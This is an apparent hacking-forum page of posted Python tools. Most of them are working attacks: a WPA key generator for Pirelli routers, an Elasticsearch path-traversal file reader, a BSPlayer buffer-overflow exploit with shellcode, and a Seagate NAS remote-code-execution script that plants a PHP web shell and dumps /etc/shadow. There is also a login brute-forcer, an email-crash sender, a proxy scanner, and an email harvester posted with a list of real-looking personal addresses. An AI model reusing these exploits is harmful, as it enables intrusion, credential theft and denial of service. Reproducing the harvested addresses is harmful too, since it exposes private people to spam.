Showing results for tags 'print'.
-
I bought this scanner a few days ago from someone, and after 2 days of scanning with it I am still waiting to catch a single socks proxy. Maybe I just don't know how to use it; I ask those who test it to post some feedback.

Usage: python scanner.py start_ip-end_ip

```python
import sys
import os
import socket
import urllib
from random import randint

def get_ports():
    port = []
    for i in range(0, 65536):
        if (i != 80 and i != 1080):
            port.append(i)
    return port

ports = get_ports()
get_host = "https://www.google.com"
socket.setdefaulttimeout(3)

def getGeo(ip):
    return urllib.urlopen('http://ipinfo.io/' + ip + '/country').read()

def get_ips(start_ip, stop_ip):
    ips = []
    tmp = []
    for i in start_ip.split('.'):
        tmp.append("%02X" % long(i))
    start_dec = long(''.join(tmp), 16)
    tmp = []
    for i in stop_ip.split('.'):
        tmp.append("%02X" % long(i))
    stop_dec = long(''.join(tmp), 16)
    while (start_dec < stop_dec + 1):
        bytes = []
        bytes.append(str(int(start_dec / 16777216)))
        rem = start_dec % 16777216
        bytes.append(str(int(rem / 65536)))
        rem = rem % 65536
        bytes.append(str(int(rem / 256)))
        rem = rem % 256
        bytes.append(str(rem))
        ips.append(".".join(bytes))
        start_dec += 1
    return ips

def scan(ip):
    vuln = open('vuln.txt', 'a')
    for port in ports:
        try:
            s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
            s.connect((ip, port))
            print "Am gasit unu!\n"
            vuln.write(ip + ":" + str(port) + '|' + getGeo(ip) + '\n')
            vuln.flush()
            s.send("GET " + get_host + " HTTP/1.0\r\n")
            s.send("\r\n")
            while 1:
                data = s.recv(1024)
                if not data:
                    break
                print data
            s.close()
        except socket.error:
            print 'Scanez..'

if len(sys.argv) < 2:
    print sys.argv[0] + "IP: start-end"
    sys.exit(1)
else:
    if len(sys.argv) == 3:
        get_host = sys.argv[2]
    if sys.argv[1].find('-') > 0:
        start_ip, stop_ip = sys.argv[1].split("-")
        ips = get_ips(start_ip, stop_ip)
        while len(ips) > 0:
            i = randint(0, len(ips) - 1)
            aip = str(ips[i])
            del ips[i]
            scan(aip)
    else:
        scan(sys.argv[1])
```
-
A little program put together during lunch break. Enjoy:

```python
__author__ = "MrGrj"

import binascii

def bas64decryption():
    encoded_string = raw_input("Please insert the base64 encrypted text:")
    # raw_input never returns None, so check for an empty string before decoding
    if not encoded_string:
        print 'You inserted a null string. Please enter a valid string next time !'
    else:
        decoded_string = encoded_string.decode('base64')
        print 'Your decoded string:' + ' ' + decoded_string

def base64encryption():
    decoded_string = raw_input("Please insert the text that you want to encode:")
    if not decoded_string:
        print 'You inserted a null string. Please enter a valid string next time !'
    else:
        encoded_string = decoded_string.encode('base64')
        print 'Your encoded string:' + ' ' + encoded_string

if __name__ == "__main__":
    menu = {}
    menu['1'] = "Base 64 decryption."
    menu['2'] = "Base 64 encryption."
    menu['3'] = "Exit."
    while True:
        options = menu.keys()
        options.sort()
        for entry in options:
            print entry, menu[entry]
        selection = raw_input("What would you like to do? ")
        if selection == "1":
            try:
                bas64decryption()
            except binascii.Error:
                print "This is not a base64 encoded string!"
        elif selection == "2":
            try:
                base64encryption()
            except binascii.Error:
                print "Something went wrong! Please try again"
        elif selection == "3":
            print "Bye-bye"
            break
        else:
            print "This is not a valid choice !"
```

I'll come back with updates in this topic with other decoding/encoding functions. Then, together with the other members who know Python, let's make something cool, optimized, etc. That is, if there is interest and I have the time. @MasterLight
-
```python
#!/usr/bin/env python
# -*- coding: utf-8 -*-
'''
@license: GPLv3
@author : Eduardo Novella

@ARNetOnline via Twitter @enovella_
2014-09-15 Send a message via website, still looking for a simple mail (http://www.telecom.com.ar/hogares/contacto_tecnico.html)
2014-09-16 Send another message to Arnet via website. First reply via twitter where they redirect me to the website form.
2014-09-19 Direct message via twitter. I talk with them about the critical vulnerability and offer them an email with PGP key
2014-09-20 More twitter PM about the same. They do not want to be aware about the problem though.
2014-09-23 I assume that Arnet does not care about its clients' security at all regarding its little interest.
2014-09-24 I send the problem to the vendor ADB Pirelli via website form
2014-09-28 I send the problem to the vendor ADB Pirelli via email to Switzerland
2015-01-05 Full disclosure and CVE-2015-0558 assigned

PORTUGAL
================
2015-04-01 I receive an email confirming that the Portuguese ISP "MEO" uses the same algorithm
2015-04-05 Send a message to @MEOpt via Twitter @enovella_
2015-04-05 I got response in matter of minutes \o/
2015-04-05 I send an email to luis-oliveira-cc@telecom.pt , stating the reference 3-78405621289 in email subject
2015-05-07 Full disclosure

-----------------
[*] Changelog :
-----------------
2015-05-06 v1.4 Added MEO routers in Portugal. Essid ADSLPT-ABXXXXX
2015-02-01 v1.3 Final version, hopefully
2015-01-12 v1.2 Confusion between LAN and WLAN mac address
2015-01-10 v1.1 --allKeys flag added
2014-09-11 v1.0 First PoC working
'''
import re
import sys
import hashlib
import argparse

VERSION = 1
SUBVERSION = 4
DATEVERSION = '2015-05-06'
URL = 'http://www.ednolo.alumnos.upv.es'

def genkey(mac, stdout='True'):
    seed = ('\x64\xC6\xDD\xE3\xE5\x79\xB6\xD9\x86\x96\x8D\x34\x45\xD2\x3B\x15' +
            '\xCA\xAF\x12\x84\x02\xAC\x56\x00\x05\xCE\x20\x75\x91\x3F\xDC\xE8')
    lookup = '0123456789abcdefghijklmnopqrstuvwxyz'
    sha256 = hashlib.sha256()
    sha256.update(seed)
    sha256.update('1236790')
    sha256.update(mac)
    digest = bytearray(sha256.digest())
    if (stdout):
        print "[+] SHA256 : %s" % sha256.hexdigest()
    return ''.join([lookup[x % len(lookup)] for x in digest[0:10]])

def printTargets():
    print "[+] Possible vulnerable targets so far:"
    for t in targets:
        print ("\t bssid: {0:s}:XX:XX:XX \t essid: WiFi-Arnet-XXXX, ADSLPT-ABXXXXX".format(t.upper()))
    sys.exit()

def checkTargets(bssid):
    supported = False
    for t in targets:
        if (bssid.upper().startswith(t)):
            supported = True
            break
    if (not supported):
        print "[!] Your bssid looks like not supported! Generating anyway."

def addIncToMac(mac_str, inc):
    try:
        mac = bytearray.fromhex('%012x' % (int(mac_str, 16) + inc))
    except:
        sys.exit('[!] Use real input ')
    return mac

def main():
    global targets
    version = " {0:d}.{1:d} [{2:s}] ----> {3:s}".format(VERSION, SUBVERSION, DATEVERSION, URL)
    targets = ['00:08:27', '00:13:C8', '00:17:C2', '00:19:3E', '00:1C:A2', '00:1D:8B', '00:22:33', '00:8C:54',
               '30:39:F2', '74:88:8B', '84:26:15', 'A4:52:6F', 'A4:5D:A1', 'D0:D4:12', 'D4:D1:84', 'DC:0B:1A', 'F0:84:2F']

    parser = argparse.ArgumentParser(description='''>>> PoC WPA keygen for WiFi Networks deployed by Arnet in Argentina and MEO in Portugal.
    So far only WiFi networks with essids like WiFi-Arnet-XXXX or ADSLPT-ABXXXXX and manufactured by Pirelli are likely vulnerable.
    See http://ednolo.alumnos.upv.es/ for more details. Twitter: @enovella_ and email: ednolo[at]inf.upv.es.
    This software is used just as proof-of-concept, commit fraud depends on you! ''',
                                     epilog='''(+) Help: python %s -b 74:88:8B:AD:C0:DE ''' % (sys.argv[0]))
    maingroup = parser.add_argument_group(title='required')
    maingroup.add_argument('-b', '--bssid', type=str, nargs='?', help='Target mac address')
    parser.add_argument('-v', '--version', action='version', version='%(prog)s' + version)
    command_group = parser.add_mutually_exclusive_group()
    command_group.add_argument('-l', '--list', help='List all vulnerable targets', action='store_true')
    command_group.add_argument('-a', '--allkeys', help='Bruteforce mode', action="store_true")
    args = parser.parse_args()

    if args.list:
        printTargets()
    elif args.bssid:
        mac_str = re.sub(r'[^a-fA-F0-9]', '', args.bssid)
        if len(mac_str) != 12:
            sys.exit('[!] Check MAC format!\n')
        try:
            checkTargets(args.bssid)
            print '[+] MAC : %s' % args.bssid
            if (args.allkeys):
                print '\n[+] WPA keys for SSID: WiFi-Arnet-XXXX (Argentina)'
                for i in xrange(-2, 5):
                    mac = addIncToMac(mac_str, i)
                    print '%-10s' % ((genkey(mac, False)))
                print '\n[+] WPA keys for SSID: ADSLPT-ABXXXXX (Portugal)'
                for i in xrange(-2, 5):
                    mac = addIncToMac(mac_str, i)
                    print '%-10s' % ((genkey(mac, False)[:8]))
            else:
                wpa = genkey((addIncToMac(mac_str, 0)), False)
                print '[+] WPA key : %-10s\t%-10s' % (wpa, "SSID: WiFi-Arnet-XXXX (Argentina)")
                print '[+] WPA key : %-10s\t%-10s' % (wpa[:8], "SSID: ADSLPT-ABXXXXX (Portugal)")
        except:
            sys.exit('[!] Are you trying to crash me? ')
    else:
        parser.print_help()

if __name__ == "__main__":
    main()
```

Source
-
```python
#!/usr/bin/python
# Crappy PoC for CVE-2015-3337 - Reported by John Heasman of DocuSign
# Affects all ElasticSearch versions prior to 1.5.2 and 1.4.5
# Pedro Andujar || twitter: pandujar || email: @digitalsec.net
# Tested on default Linux (.deb) install /usr/share/elasticsearch/plugins/

import socket, sys

print "!dSR ElasticPwn - for CVE-2015-3337\n"

if len(sys.argv) <> 3:
    print "Ex: %s www.example.com /etc/passwd" % sys.argv[0]
    sys.exit()

port = 9200  # Default ES http port
host = sys.argv[1]
fpath = sys.argv[2]

def grab(plugin):
    socket.setdefaulttimeout(3)
    s = socket.socket()
    s.connect((host, port))
    s.send("GET /_plugin/" + plugin + "/../../../../../.." + fpath + " HTTP/1.0\n"
           "Host: " + host + "\n\n")
    file = s.recv(2048)
    print " [*] Trying to retrieve " + str(fpath) + ":"
    if ("HTTP/1.0 200 OK" in file):
        print "\n" + file
    else:
        print "[-] File Not Found or system not vulnerable"

def pfind(plugin):
    try:
        socket.setdefaulttimeout(3)
        s = socket.socket()
        s.connect((host, port))
        s.send("GET /_plugin/" + plugin + "/ HTTP/1.0\n"
               "Host: " + host + "\n\n")
        file = s.recv(16)
        print "[*] Trying to find plugin " + plugin + ":"
        if ("HTTP/1.0 200 OK" in file):
            print "[+] Plugin found!"
            grab(plugin)
            sys.exit()
        else:
            print "[-] Not Found "
    except Exception, e:
        print "[-] Error connecting to " + host + " " + str(e)
        sys.exit()

# Include more plugin names to check if they are installed
pluginList = ['test', 'kopf', 'HQ', 'marvel', 'bigdesk', 'head']

for plugin in pluginList:
    pfind(plugin)
```

Source
-
```python
#!/usr/bin/python
'''
Bsplayer suffers from a buffer overflow vulnerability when processing the HTTP response when opening a URL.
In order to exploit this bug I partially overwrited the seh record to land at pop pop ret instead of the full
address and then used backward jumping to jump to a long jump that eventually land in my shellcode.
Tested on : windows xp sp1 - windows 7 sp1 - Windows 8 Enterprise
it might work in other versions as well just give it a try
My twitter: @fady_osman
My youtube: https://www.youtube.com/user/cutehack3r
'''
import socket
import sys

s = socket.socket()  # Create a socket object
if (len(sys.argv) < 3):
    print "[x] Please enter an IP and port to listen to."
    print "[x] " + sys.argv[0] + " ip port"
    exit()
host = sys.argv[1]       # Ip to listen to.
port = int(sys.argv[2])  # Reserve a port for your service.
s.bind((host, port))     # Bind to the port
print "[*] Listening on port " + str(port)
s.listen(5)              # Now wait for client connection.
c, addr = s.accept()     # Establish connection with client.
# Sending the m3u file so we can reconnect to our server to send both the flv file and later the payload.
print(('[*] Sending the payload first time', addr))
c.recv(1024)
# seh and nseh.
buf = ""
buf += "\xbb\xe4\xf3\xb8\x70\xda\xc0\xd9\x74\x24\xf4\x58\x31"
buf += "\xc9\xb1\x33\x31\x58\x12\x83\xc0\x04\x03\xbc\xfd\x5a"
buf += "\x85\xc0\xea\x12\x66\x38\xeb\x44\xee\xdd\xda\x56\x94"
buf += "\x96\x4f\x67\xde\xfa\x63\x0c\xb2\xee\xf0\x60\x1b\x01"
buf += "\xb0\xcf\x7d\x2c\x41\xfe\x41\xe2\x81\x60\x3e\xf8\xd5"
buf += "\x42\x7f\x33\x28\x82\xb8\x29\xc3\xd6\x11\x26\x76\xc7"
buf += "\x16\x7a\x4b\xe6\xf8\xf1\xf3\x90\x7d\xc5\x80\x2a\x7f"
buf += "\x15\x38\x20\x37\x8d\x32\x6e\xe8\xac\x97\x6c\xd4\xe7"
buf += "\x9c\x47\xae\xf6\x74\x96\x4f\xc9\xb8\x75\x6e\xe6\x34"
buf += "\x87\xb6\xc0\xa6\xf2\xcc\x33\x5a\x05\x17\x4e\x80\x80"
buf += "\x8a\xe8\x43\x32\x6f\x09\x87\xa5\xe4\x05\x6c\xa1\xa3"
buf += "\x09\x73\x66\xd8\x35\xf8\x89\x0f\xbc\xba\xad\x8b\xe5"
buf += "\x19\xcf\x8a\x43\xcf\xf0\xcd\x2b\xb0\x54\x85\xd9\xa5"
buf += "\xef\xc4\xb7\x38\x7d\x73\xfe\x3b\x7d\x7c\x50\x54\x4c"
buf += "\xf7\x3f\x23\x51\xd2\x04\xdb\x1b\x7f\x2c\x74\xc2\x15"
buf += "\x6d\x19\xf5\xc3\xb1\x24\x76\xe6\x49\xd3\x66\x83\x4c"
buf += "\x9f\x20\x7f\x3c\xb0\xc4\x7f\x93\xb1\xcc\xe3\x72\x22"
buf += "\x8c\xcd\x11\xc2\x37\x12"
jmplong = "\xe9\x85\xe9\xff\xff"
nseh = "\xeb\xf9\x90\x90"
# Partially overwriting the seh record (nulls are ignored).
seh = "\x3b\x58\x00\x00"
buflen = len(buf)
response = "\x90" * 2048 + buf + "\xcc" * (6787 - 2048 - buflen) + jmplong + nseh + seh  # + "\xcc" * 7000
c.send(response)
c.close()
c, addr = s.accept()  # Establish connection with client.
# Sending the m3u file so we can reconnect to our server to send both the flv file and later the payload.
print(('[*] Sending the payload second time', addr))
c.recv(1024)
c.send(response)
c.close()
s.close()
```

Source
-
```python
#!/usr/bin/python
import sys
import re
import string
import httplib
import urllib2

def StripTags(text):
    finished = 0
    while not finished:
        finished = 1
        start = text.find("<")
        if start >= 0:
            stop = text[start:].find(">")
            if stop >= 0:
                text = text[:start] + text[start + stop + 1:]
                finished = 0
    return text

if len(sys.argv) != 2:
    print "\nExtracts emails from google results.\n"
    print "\nUsage : ./goog-mail.py <domain-name>\n"
    sys.exit(1)

domain_name = sys.argv[1]
d = {}
page_counter = 0
try:
    while page_counter < 50:
        results = 'http://groups.google.com/groups?q=' + str(domain_name) + '&hl=en&lr=&ie=UTF-8&start=' + repr(page_counter) + '&sa=N'
        request = urllib2.Request(results)
        request.add_header('User-Agent', 'Mozilla/4.0 (compatible; MSIE 5.5; Windows NT 5.0)')
        opener = urllib2.build_opener()
        text = opener.open(request).read()
        emails = (re.findall('([\w\.\-]+@' + domain_name + ')', StripTags(text)))
        for email in emails:
            d[email] = 1
            uniq_emails = d.keys()
        page_counter = page_counter + 10
except IOError:
    print "Can't connect to Google Groups!"

page_counter_web = 0
try:
    print "\n\n+++++++++++++++++++++++++++++++++++++++++++++++++++++"
    print "+ Google Web & Group Results:"
    print "+++++++++++++++++++++++++++++++++++++++++++++++++++++\n\n"
    while page_counter_web < 50:
        results_web = 'http://www.google.com/search?q=%40' + str(domain_name) + '&hl=en&lr=&ie=UTF-8&start=' + repr(page_counter_web) + '&sa=N'
        request_web = urllib2.Request(results_web)
        request_web.add_header('User-Agent', 'Mozilla/4.0 (compatible; MSIE 5.5; Windows NT 5.0)')
        opener_web = urllib2.build_opener()
        text = opener_web.open(request_web).read()
        emails_web = (re.findall('([\w\.\-]+@' + domain_name + ')', StripTags(text)))
        for email_web in emails_web:
            d[email_web] = 1
            uniq_emails_web = d.keys()
        page_counter_web = page_counter_web + 10
except IOError:
    print "Can't connect to Google Web!"

for uniq_emails_web in d.keys():
    print uniq_emails_web
```

Source

Test!

```
anci-ste@alice.it
fcrovace@alice.it
antorake@alice.it
lauradilu@alice.it
salvo_brusca67@alice.it
pagescaos_calmo@alice.it
claudio.maccherani@alice.it
pagesaicelombarda@alice.it
monicagasbarri@alice.it
S.Camillo-Forlaninilportalone@alice.it
materli1@alice.it
lsantini@alice.it
pincopallino@alice.it
gratours@alice.it
aicelombarda@alice.it
Castrofilippofilippafarruggio@alice.it
pagesfcrovace@alice.it
luci.ba@alice.it
```

Maybe someone can make it work better; it grabs at most 10-20 emails and then stops. I kindly ask them to send it to me too, or to post it!
-
```python
#!/usr/bin/env python
#
# Seagape
# =======
# Seagate Business NAS pre-authentication remote code execution
# exploit as root user.
#
# by OJ Reeves (@TheColonial) - for full details please see
# https://beyondbinary.io/advisory/seagate-nas-rce/
#
# Usage
# =====
# seagape.py <ip> <port> [-c [ua]]
#
# - ip   : ip or host name of the target NAS
# - port : port of the admin web ui
# - -c   : (optional) create a cookie which will give admin access.
#          Not specifying this flag results in webshell installation.
# - ua   : (optional) the user agent used by the browser for the
#          admin session (UA must match the target browser).
#          Default value is listed below
#
# Example
# =======
# Install and interact with the web shell:
#   seagape.py 192.168.0.1 80
#
# Create admin cookie
#   seagape.py 192.168.0.1 80 -c

import base64
import hashlib
import itertools
import os
import re
import socket
import sys
import urllib
import urllib2
import uuid
import xml.sax.saxutils

if len(sys.argv) < 3:
    print "Usage: {0} <ip> <port> [-c [user agent]]".format(sys.argv[0])
    sys.exit(1)

# Every Seagate nas has the same XOR key. Great.
XOR_KEY = '0f0a000d02011f0248000d290d0b0b0e03010e07'

# This is the User agent we'll use for most of the requests
DEFAULT_UA = 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_7_3) AppleWebKit/534.55.3 (KHTML, like Gecko) Version/5.1.3 Safari/534.53.10'

# This is the description we're going to be reading from
LFI_FILE = '/etc/devicedesc'

# the base globals that will hold our state
host = sys.argv[1]
port = int(sys.argv[2])
cis = ''
hostname = ''
webshell = str(uuid.uuid1()) + ".php"

def chunks(s, n):
    for i in xrange(0, len(s), n):
        yield s[i:i + n]

def forward_interleave(a, b):
    return ''.join(itertools.chain(*zip(itertools.cycle(a), b)))

def xor(s, k):
    return ''.join(chr(ord(a) ^ ord(b)) for a, b in itertools.izip(s, itertools.cycle(k)))

def sha1(s):
    return hashlib.sha1(s).hexdigest()

def decode(s):
    f = xor(s, XOR_KEY)
    return ''.join(chr(ord(a) ^ ord(b)) for a, b in chunks(f, 2))

def encode(s):
    s = forward_interleave(sha1(s), s)
    s = ''.join(a + chr(ord(a) ^ ord(b)) for a, b in chunks(s, 2))
    return xor(s, XOR_KEY)

def make_request(uri="/", ci_session=None, headers=None, post_data=None):
    method = 'GET'
    if not headers:
        headers = {}
    headers['Host'] = host
    if 'User-Agent' not in headers:
        headers['User-Agent'] = DEFAULT_UA
    if 'Accept' not in headers:
        headers['Accept'] = 'text/html'
    if post_data:
        method = 'POST'
        post_data = urllib.urlencode(post_data)
        headers['Content-Type'] = 'application/x-www-form-urlencoded'
    if ci_session:
        ci_session = urllib.quote(base64.b64encode(encode(ci_session)))
        headers['Cookie'] = 'ci_session={0}'.format(ci_session)
    s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
    s.connect((host, port))
    http = ""
    http += "{0} {1} HTTP/1.1\r\n".format(method, uri)
    for h in headers:
        http += "{0}: {1}\r\n".format(h, headers[h])
    if post_data:
        http += "Content-Length: {0}\r\n".format(len(post_data))
    http += "\r\n"
    if post_data:
        http += post_data
    s.send(http)
    result = ""
    while True:
        data = s.recv(1024)
        if not data:
            break
        result += data
    s.close()
    return result

def get_ci_session():
    resp = make_request()
    for l in resp.split("\r\n"):
        m = re.findall("Set-Cookie: ([a-zA-Z0-9_\-]+)=([a-zA-Z0-9\+%=/]+);", l)
        for name, value in m:
            if name == 'ci_session' and len(value) > 40:
                return decode(base64.b64decode(urllib.unquote(value)))
    print "Unable to establish session with {0}".format(host)
    sys.exit(1)

def add_string(ci_session, key, value):
    prefix = 's:{0}:"{1}";s:'.format(len(key), key)
    if prefix in ci_session:
        ci_session = re.sub(r'{0}\d+:"[^"]*"'.format(prefix),
                            '{0}{1}:"{2}"'.format(prefix, len(value), value), ci_session)
    else:
        # doesn't exist, so we need to add it to the start and the end.
        count = int(ci_session.split(':')[1]) + 1
        ci_session = re.sub(r'a:\d+(.*)}$',
                            r'a:{0}\1{1}{2}:"{3}";}}'.format(count, prefix, len(value), value), ci_session)
    return ci_session

def set_admin(ci_session):
    return add_string(ci_session, "is_admin", "yes")

def set_language(ci_session, lang):
    return add_string(ci_session, "language", lang)

def include_file(ci_session, file_path):
    if file_path[0] == '/':
        file_path = '../../../../../..' + file_path
    return set_language(ci_session, file_path + "\x00")

def read_file(file_path, post_data=None):
    resp = make_request(ci_session=include_file(cis, file_path), headers={}, post_data=post_data)
    return resp

def hashdump():
    shadow = read_file('/etc/shadow')
    for l in shadow.split("\n"):
        if l and ':!:' not in l and ':' not in l:
            parts = l.split(':')
            print "{0}:{1}".format(parts[0], parts[1])

def cmd(command):
    headers = {
        'Content-Type': 'application/x-www-form-urlencoded',
        'Accept': '*/*',
        'User-Agent': DEFAULT_UA
    }
    post_data = urllib.urlencode({'c': command})
    headers['Content-Type'] = 'application/x-www-form-urlencoded'
    ci_session = urllib.quote(base64.b64encode(encode(cis)))
    headers['Cookie'] = 'ci_session={0}'.format(ci_session)
    url = 'http://{0}:{1}/{2}'.format(host, port, webshell)
    req = urllib2.Request(url, headers=headers, data=post_data)
    return urllib2.urlopen(req).read()

def shell():
    running = True
    while running:
        c = raw_input("Shell ({0}) $ ".format(post_id))
        if c != 'quit' and c != 'exit':
            cmd(c)
        else:
            running = False

def show_admin_cookie(user_agent):
    ci_session = add_string(cis, 'is_admin', 'yes')
    ci_session = add_string(ci_session, 'username', 'admin')
    ci_session = add_string(ci_session, 'user_agent', user_agent)
    ci_session = urllib.quote(base64.b64encode(encode(ci_session)))
    print "Session cookies are bound to the browser's user agent."
    print "Using user agent: " + user_agent
    print "ci_session=" + ci_session

def show_version():
    print "Firmware Version: {0}".format(get_firmware_version())

def show_cookie():
    print cis

def show_help():
    print ""
    print "Seagape v1.0 -- Interactive Seagate NAS Webshell"
    print " - OJ Reeves (@TheColonial) - https://beyondbinary.io/"
    print " - https://beyondbinary.io/bbsec/001"
    print "==========================================================================="
    print "version          - Print the current firmware version to screen."
    print "dumpcookie       - Print the current cookie to screen."
    print "admincookie <ua> - Create an admin login cookie (ua == user agent string)."
    print "                   Add to your browser and access ANY NAS box as admin."
    print "help             - Show this help."
    print "exit / quit      - Run for the hills."
    print "<anything else>  - Execute the command on the server."
    print ""

def execute(user_input):
    result = True
    parts = user_input.split(' ')
    c = parts[0]
    if c == 'admincookie':
        ua = DEFAULT_UA
        if len(parts) > 1:
            ua = ' '.join(parts[1:])
        show_admin_cookie(ua)
    elif c == 'dumpcookie':
        show_cookie()
    elif c == 'version':
        show_version()
    elif c == 'help':
        show_help()
    elif c == 'quit' or c == 'exit':
        remove_shell()
        result = False
    else:
        print cmd(user_input)
    return result

def get_firmware_version():
    resp = make_request("/index.php/mv_system/get_firmware?_=1413463189043", ci_session=acis)
    return resp.replace("\r", "").replace("\n", "").split("version")[1][1:-2]

def install_shell():
    resp = make_request("/index.php/mv_system/get_general_setup?_=1413463189043", ci_session=acis)
    existing_setup = ''
    for l in resp.split("\r\n"):
        if 'general_setup' in l:
            existing_setup = l
            break
    # generate the shell and its installer
    exec_post = base64.b64encode("<?php if(isset($_POST['c'])&&!empty($_POST['c'])){system($_POST['c']);} ?>")
    installer = '<?php file_put_contents(\'{0}\', base64_decode(\'{1}\')); ?>'.format(webshell, exec_post)
    write_php = xml.sax.saxutils.quoteattr(installer)[1:-1]
    start = existing_setup.index('" description="') + 15
    end = existing_setup.index('"', start)
    updated_setup = existing_setup[0:start] + write_php + existing_setup[end:]
    # write the shell to the description
    resp = make_request("/index.php/mv_system/set_general_setup?_=1413463189043", ci_session=acis,
                        headers={}, post_data={'general_setup': updated_setup})
    # invoke the installer
    read_file(LFI_FILE)
    # remove the installer
    resp = make_request("/index.php/mv_system/set_general_setup?_=1413463189043", ci_session=acis,
                        headers={}, post_data={'general_setup': existing_setup})

def remove_shell():
    return cmd('rm -f {0}'.format(webshell))

print "Establishing session with {0} ...".format(host)
cis = get_ci_session()

if len(sys.argv) >= 4 and sys.argv[3] == '-c':
    ua = DEFAULT_UA
    if len(sys.argv) > 4:
        ua = sys.argv[4]
    show_admin_cookie(ua)
else:
    print "Configuring administrative access ..."
    acis = add_string(cis, 'is_admin', 'yes')
    acis = add_string(acis, 'username', 'admin')
    print "Installing web shell (takes a while) ..."
    install_shell()
    print "Extracting id and hostname ..."
    identity = cmd('whoami').strip()
    hostname = cmd('cat /etc/hostname').strip()
    show_help()
    running = True
    while running:
        try:
            user_input = raw_input("Seagape ({0}@{1})> ".format(identity, hostname))
            running = execute(user_input)
        except:
            print "Something went wrong. Try again."
```

Source
-
Summary: A bug in the stock Google email application version 4.4.2.0200 has been found. An attacker can remotely perform a Denial of Service attack by sending a specially crafted email. No interaction from the user is needed to produce the crash; just receiving the malicious email is enough. CVE-2015-1574 has been assigned. Version 4.2.2.0200 running on a Samsung Galaxy 4 mini fully updated (19 Jan 2015) is affected. Newer versions 4.2.2.0400 are not affected.

Details and proof of concept exploit at: http://hmarco.org/bugs/google_email_app_4.2.2_denial_of_service.html

Regards,
Hector Marco.
http://hmarco.org

----------------

Exploit crash_Android_Google_email_4.2.2.0200.py:

```python
#!/usr/bin/python
'''
 * $FILE: crash_Android_Google_email_4.2.2.0200.py
 *
 * $VERSION$
 *
 * Authors: Hector Marco <hecmargi@upv.es>
 *          Ismael Ripoll <iripoll@disca.upv.es>
 *
 * Date: Released 07 Jan 2015
 *
 * Attack details: http://hmarco.org
 *
 * $LICENSE:
 * This program is free software; you can redistribute it and/or modify
 * it under the terms of the GNU General Public License as published by
 * the Free Software Foundation; either version 2 of the License, or
 * (at your option) any later version.
 *
 * This program is distributed in the hope that it will be useful,
 * but WITHOUT ANY WARRANTY; without even the implied warranty of
 * MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE.  See the
 * GNU General Public License for more details.
 *
 * You should have received a copy of the GNU General Public License
 * along with this program; if not, write to the Free Software
 * Foundation, Inc., 59 Temple Place - Suite 330, Boston, MA 02111-1307, USA.
'''
import smtplib
from smtplib import SMTPException
import sys
import getopt

#### START CONFIGURE #####
smtpServer = ""       # set an appropriate SMTP server
smtpServerPort = 25   # SMTP port, default 25
#### END CONFIGURE #####

sender = ''
receivers = []

def usage():
    print '\n$ %s -s sender@email.com -r receiver@email.com\n' % sys.argv[0]
    sys.exit(2)

def smtpNotConfigured():
    print '\n[-] Error: Edit this script and set a SMTP server to send emails\n'
    sys.exit(2)

def printHeader():
    print "\nEmail Android Google 4.2.2.0200 crasher"
    print "======================================="
    print "Author: Hector Marco <hmarco@hmarco.org>"
    print "Website: http://hmarco.org"

def main(argv):
    global sender
    global receivers
    try:
        opts, args = getopt.getopt(argv, "hs:r:", ["s=", "r="])
        if len(sys.argv) == 1:
            usage()
    except getopt.GetoptError:
        usage()
    for opt, arg in opts:
        if opt == '-h':
            usage()
        elif opt in ("-s", "--sender"):
            sender = arg
        elif opt in ("-r", "--receiver"):
            receivers.append(arg)

if __name__ == "__main__":
    printHeader()
    if len(smtpServer) == 0:
        smtpNotConfigured()
    main(sys.argv[1:])

    message = "From: Sender <%s>\n" % sender
    message += "To: Receiver <%s>\n" % receivers[0]
    message += """Subject: Crash test
Content-Type: text/plain
Content-Transfer-Encoding: 8BIT
Content-Disposition: ;

"""
    print "\n[+] Sending crafted message to: %s" % receivers[0]
    try:
        smtpObj = smtplib.SMTP(smtpServer, int(smtpServerPort))
        smtpObj.sendmail(sender, receivers, message)
        print "[+] Malicious email successfully sent."
    except SMTPException:
        print "[-] Error: unable to send the email. Invalid SMTP server ???"
        sys.exit(2)
```

Source
-
Hadoop User Experience password cracking script. Written in Python.

```python
#!/usr/bin/python
import os
import sys
import requests
import datetime
from fake_useragent import UserAgent

## CONFIG STARTS HERE ##
user = "admin"
host = "hostname:port"
listfile = "~/dictionaries/top1000-worst-passwords.txt"
## CONFIG ENDS HERE ##

# open() does not expand "~", so expand the path explicitly
dictionary = open(os.path.expanduser(listfile))
lines = dictionary.readlines()
words = []
print "Initializing dictionary",
for entry in lines:
    print '.',
    newword = entry.rstrip("\n")
    words.append(newword)
print "Now testing "

for password in words:
    ua = UserAgent().random
    headers = {"User-Agent": ua}
    post = {"username": user, "password": password}
    r = requests.post("http://" + host + "/accounts/login/?next=/", headers=headers, data=post)
    invalid = r.text.find("Invalid")
    if invalid == -1:
        print "\nSuccess! " + user + ":" + password
        print "Completed test at ",
        print datetime.datetime.now()
        sys.exit()
    else:
        print "...."
print "Attack unsuccessful...Completed at ",
print datetime.datetime.now()
```

Source
-
The term “Big Data” has been flinging around quite a lot lately. It is in the news all the time. We hear about how much it has pushed us into the future and into the internet of things. These things all will produce useful data that will need to be analyzed and stored. One technology that we hear more and more about is Hadoop. Hadoop was birthed as an open source project from the Google filesystem (GFS), and Map Reduce white-papers; the creator is Doug Cutting and the open source community. Map reduce is the core of Hadoop, and allows the user to write very simple programs to distribute workload across a complex amount of data. The Google filesystem inspired the majority of the work for the open source Hadoop filesystem (HDFS). HDFS is a redundant filesystem written in Java that distributes data across multiple machines that can be analyzed using Map reduce programming. That is just a brief dive into what Hadoop is, and if you want to learn more I highly recommend you take a gander at the Yahoo Hadoop tutorial. Here is an ecosystem filled with projects that make managing this complex monster easier on administrator’s and developer’s. One of these projects that I really enjoy is Hue, the Hadoop User Experience. It gives a web interface for the user to query their data using some of these projects that live in this big data ecosystem like: Hive Pig Oozie Impala Each of these tools sits in front of a plethora of data that the user is analyzing. This data can be anything from a company’s customer generated data that tells a music service what song to play next, to another company trying to figure out which ads to serve you based on your browsing history. My point being — Hue has access to some seriously valuable information. As with most technologies, security is often an after-thought. 
